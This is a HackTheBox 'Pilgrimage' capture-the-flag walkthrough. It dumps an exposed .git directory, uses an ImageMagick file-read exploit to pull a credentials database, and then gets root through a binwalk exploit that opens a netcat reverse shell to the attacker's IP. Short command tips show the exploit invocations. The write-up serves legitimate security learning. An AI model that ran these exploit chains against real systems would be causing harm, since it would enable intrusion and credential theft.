HackTheBox : Pilgriamge
Intro : It is a easy machine in hackthebox platform. It is in Hacker’s Clash Season II. Here we will find some exploit using CVE and some basic Linux Skill. Basically is based on CVE. So let’s start our journey.
Nmap Scan :
As usual we start with a basic Port Scan using Nmap. I found 2 Ports are open : 22(ssh), 80(http). As usual in a CTF.
I also add ‘pilgrimage.htb’ along with IP in my host file and I start a ‘Nikto’ scan to find vulnerability.
Web Enumeration :
Then I visit the Website to explore. It is simple website to ‘shrink’ image. And nothing is there not also in Source Code. I also sign up and login but that portion is not also vulnerable.
I post a image and it gives a link to see the image.
Web Exploitation :
Then I start a simple ‘GoBuster’ scan with a common wordlist. And it tells me that a ‘.git’ directory is present there. Others are not too much Interesting.
So I think we can Dump that total directory with ‘GitDumper’ Tool. So I downloaded that tool from here.
Then I use that python code to dump the ‘.git’ directory. It will take 1 minute to dump all things.
After Dumping I found all the website file along with a Executable File called ‘magic’. That means we can run that file.
I saw there is a ‘sqlite’ database file present in ‘dashboard.php’. But we cannot see that as we don’t get any Shell. How Fun!
Get User Shell As Emily :
Then I try to run that Executable file and found that the Version of that tool is Exploitable.
The 7.1.0–49 version is vulnerable and I found a exploit code in Github Repo Here.
I downloaded that repo in my machine.
Then I run that exploit. Before that you have to download Python Module called ‘pypng’. Then you can run that Exploit.
Basically the explout helps us to read Syatem Files like : ‘/etc/passwd’. So we we can also read that Database File using this Script. It will save that exploit in a image format and we have to paste that in webpage then a link will generate. After downloading the link(image) we can decode that with that ‘magic’ Tool.
Tip : pip3 install pypng
Tip : python3 generate.py -f “/var/db/pilgrimage” -o exploit.png
Then I paste that exploit.png file with our website and download that linked image in my Machine.
I download the above link with ‘wget’ command and I get the Image.
Then I run that magic Tool over that png file.
Tip : ./magic identify -verbose <your_image_name>
There will be a long Hex Encoded data. I will not show you the total data because it is too long.
I use ‘CyberChef’ to decode that data and saved it in a file. I named the file with ‘<name>.sqlite’ Extension.
Then I cat out that file and got a Username and Password with no space.
Tip : e***y : ab************23
Then I used ssh to login and I logged in as Emily. Bingo!!!!!
And we got our ‘User_Flag’.
Privilege Escalation :
So it’s time for some PrivEsc to get into Root.
So I downloaded ‘pspy64’ in victim’s machine and ran it.
I notice there are so many process but I found something Interesting there. There is a process running ‘malwarescan.sh’.
So I visited that folder and cat out that File.
So it is using ‘Binwalk’ and doing something in ‘/var/www/pilgrimage.htb/shrunk’. So let’s see that binwalk binary.
So after typing the binwalk command it shows us the Version and it’s usage.
I checked the Version in Google and it is Exploitable.(RCE)
So I copied and saved that python exploit in ‘/dev/shm’ folder.
As the exploit will take an argument as a ‘png’ file so I make a ‘png’ format exploit with the previous ‘ImageMagick’ Tool.
Tip : python3 generate.py -f “” -o <anyname>.png
Then I serve that with my python server to the Victim’s Machine.
Tip : python3 exploit.py test1.png <tun0_ip> <listened_port>
It is saying rename the binwalk_exploit and start your netcat listener.
Then I rename the exploit and saved it in ‘/var/www/pilgrimage.htb/shrunk’ as mentioned in process.
You can change the name whatever.
After sometime I get a response in my Netcat listener.
I type ‘whoami’ and we are now Root. Wooooo!!!!!!! Double Bingo!!!
In this way I pawned the Machine. Hope you learn something new here.
THANKS FOR READING!!
Happy Hacking~
